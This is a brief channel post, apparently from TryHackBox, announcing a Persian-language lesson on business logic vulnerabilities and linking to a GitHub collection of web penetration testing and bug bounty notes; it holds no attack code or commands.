• فاز 13 - آسیب پذیری منطق تجاری.
@TryHackBox
@TryHackBoxOfficial
GitHub
GitHub - xalgord/Massive-Web-Application-Penetration-Testing-Bug-Bounty-Notes: A comprehensive guide for web application penetration…
A comprehensive guide for web application penetration testing and bug bounty hunting, covering methodologies, tools, and resources for identifying and exploiting vulnerabilities. - xalgord/Massive-...
🔥6